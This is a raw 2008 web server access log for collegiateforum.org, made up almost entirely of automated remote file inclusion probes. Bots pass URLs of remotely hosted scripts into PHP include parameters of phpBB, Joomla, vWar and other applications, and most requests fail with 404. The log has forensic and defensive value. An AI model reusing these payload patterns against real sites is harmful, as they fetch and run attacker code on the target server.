217.20.113.117 - - [25/Aug/2008:06:01:37 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:01:39 -0700] "GET /logs/access.log//bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:01:39 -0700] "GET //bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:01:39 -0700] "GET /logs//bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:01:42 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:02:45 -0700] "GET /logs/access.log/addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:02:45 -0700] "GET /addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:02:45 -0700] "GET /logs/addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:24 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:24 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:38 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:38 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:04:39 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.67.56.17 - - [25/Aug/2008:06:04:57 -0700] "GET /logs/access_080609.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:06:21 -0700] "GET //bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:06:21 -0700] "GET /logs//bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:06:29 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:06:29 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:06:48 -0700] "GET /logs/access_080324.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:06:48 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:06:48 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:07:23 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:07:47 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
198.199.208.171 - - [25/Aug/2008:06:07:48 -0700] "GET /logs/access.log HTTP/1.1" 200 5457 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
217.20.113.117 - - [25/Aug/2008:06:07:48 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.95.16.200 - - [25/Aug/2008:06:08:02 -0700] "GET /logs/access.log HTTP/1.1" 200 6133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:08:19 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.94.175.243 - - [25/Aug/2008:06:08:29 -0700] "GET /logs/access.log HTTP/1.1" 200 6546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
59.95.69.247 - - [25/Aug/2008:06:08:38 -0700] "GET /logs/access.log HTTP/1.1" 200 6723 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
219.117.239.114 - - [25/Aug/2008:06:09:02 -0700] "GET /logs/access_080204.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.collegiateforum.org"
80.67.56.17 - - [25/Aug/2008:06:09:07 -0700] "GET /logs/access_080609.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.221.130.20 - - [25/Aug/2008:06:10:52 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:11:35 -0700] "GET /logs/access.log//bandroom/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
91.200.212.3 - - [25/Aug/2008:06:13:14 -0700] "GET /logs/access_080204.log/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:13:20 -0700] "GET /logs/addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:13:20 -0700] "GET /addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:06:13:21 -0700] "GET /logs/access.log/addevent.inc.php?agendax_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:14 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:15 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:15 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:15 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:20 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:21 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:21 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "collegiateforum.org"
212.103.152.139 - - [25/Aug/2008:06:14:21 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:16:02 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:06:16:38 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.barbadossportingzones.com/admin/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:06:16:40 -0700] "GET ///vwar/backup/errors.php?error=http://www.barbadossportingzones.com/admin/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:06:16:43 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.barbadossportingzones.com/admin/cmd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:06:20:45 -0700] "GET /errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:06:20:48 -0700] "GET /logs/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
91.184.2.186 - - [25/Aug/2008:06:21:28 -0700] "GET /logs/access_080331.log//newspublish/include.php?path%5Bdocroot%5D=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
91.184.2.186 - - [25/Aug/2008:06:21:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
91.184.2.186 - - [25/Aug/2008:06:21:29 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:06:21:39 -0700] "GET /errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:06:21:39 -0700] "GET /logs/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
72.29.70.187 - - [25/Aug/2008:06:21:52 -0700] "GET /errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:22:20 -0700] "GET /homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:22:21 -0700] "GET /logs/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
121.180.11.132 - - [25/Aug/2008:06:22:32 -0700] "GET /logs//components/com_extcalendar/errors.php?error=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
121.180.11.132 - - [25/Aug/2008:06:22:32 -0700] "GET /logs/access_080324.log//components/com_extcalendar/errors.php?error=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
121.180.11.132 - - [25/Aug/2008:06:22:32 -0700] "GET //components/com_extcalendar/errors.php?error=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
91.184.2.186 - - [25/Aug/2008:06:22:33 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:22:56 -0700] "GET /logs/access_080331.log/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:22:59 -0700] "GET /logs/access.log/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:23:14 -0700] "GET /logs/access_080609.log/!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:23:14 -0700] "GET /!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:23:14 -0700] "GET /logs/!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:23:15 -0700] "GET /logs/access_080630.log/!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:23:16 -0700] "GET /logs/access_080331.log/homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:23:18 -0700] "GET /homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:23:18 -0700] "GET /logs/homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:23:23 -0700] "GET /logs/access.log/homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:30 -0700] "GET /logs/access_080331.log/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:30 -0700] "GET /homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:30 -0700] "GET /logs/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:37 -0700] "GET /logs/access.log/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:37 -0700] "GET /homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:23:37 -0700] "GET /logs/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:23:51 -0700] "GET /logs/access_080609.log%20/!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:24:18 -0700] "GET /logs/access.log/homepage.php?sel=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.172.169 - - [25/Aug/2008:06:24:27 -0700] "GET /logs/access.log/!scanhttp://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.180.11.132 - - [25/Aug/2008:06:25:41 -0700] "GET /logs/access_080204.log//components/com_extcalendar/errors.php?error=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:27:09 -0700] "GET /logs/access_080331.log/homepage.php?sel=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:27:09 -0700] "GET /homepage.php?sel=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:28:17 -0700] "GET /logs/access.log/homepage.php?sel=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:28:18 -0700] "GET /homepage.php?sel=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:28:18 -0700] "GET /logs/homepage.php?sel=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:29:01 -0700] "GET /logs/homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:29:01 -0700] "GET /homepage.php?sel=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:30:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.88.225.165 - - [25/Aug/2008:06:30:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:31:32 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:32:11 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:32:12 -0700] "GET /logs/access_080310.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:32:14 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:06:32:34 -0700] "GET /logs/access_080526.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:33:40 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.66.111.162 - - [25/Aug/2008:06:33:41 -0700] "GET /start.phphttp://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.66.111.162 - - [25/Aug/2008:06:33:41 -0700] "GET /logs/access_080331.log/start.phphttp://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.66.111.162 - - [25/Aug/2008:06:33:42 -0700] "GET /logs/start.phphttp://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:33:51 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [25/Aug/2008:06:34:36 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.232.196.106 - - [25/Aug/2008:06:34:36 -0700] "GET //?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 934 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.232.196.106 - - [25/Aug/2008:06:34:36 -0700] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.810" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:35:27 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:06:35:40 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:37:22 -0700] "GET /logs/access_080310.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:37:22 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:37:22 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:06:37:33 -0700] "GET /logs/access_080623.log//modules/xoopsgallery/upgrade_album.php?GALLERYhttp://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.222.31.133 - - [25/Aug/2008:06:38:44 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.222.31.133 - - [25/Aug/2008:06:38:45 -0700] "GET //?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 934 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.222.31.133 - - [25/Aug/2008:06:38:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://h1.ripway.com/syscod3/TT???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.803" "www.collegiateforum.org"
212.92.23.250 - - [25/Aug/2008:06:39:24 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:06:40:20 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
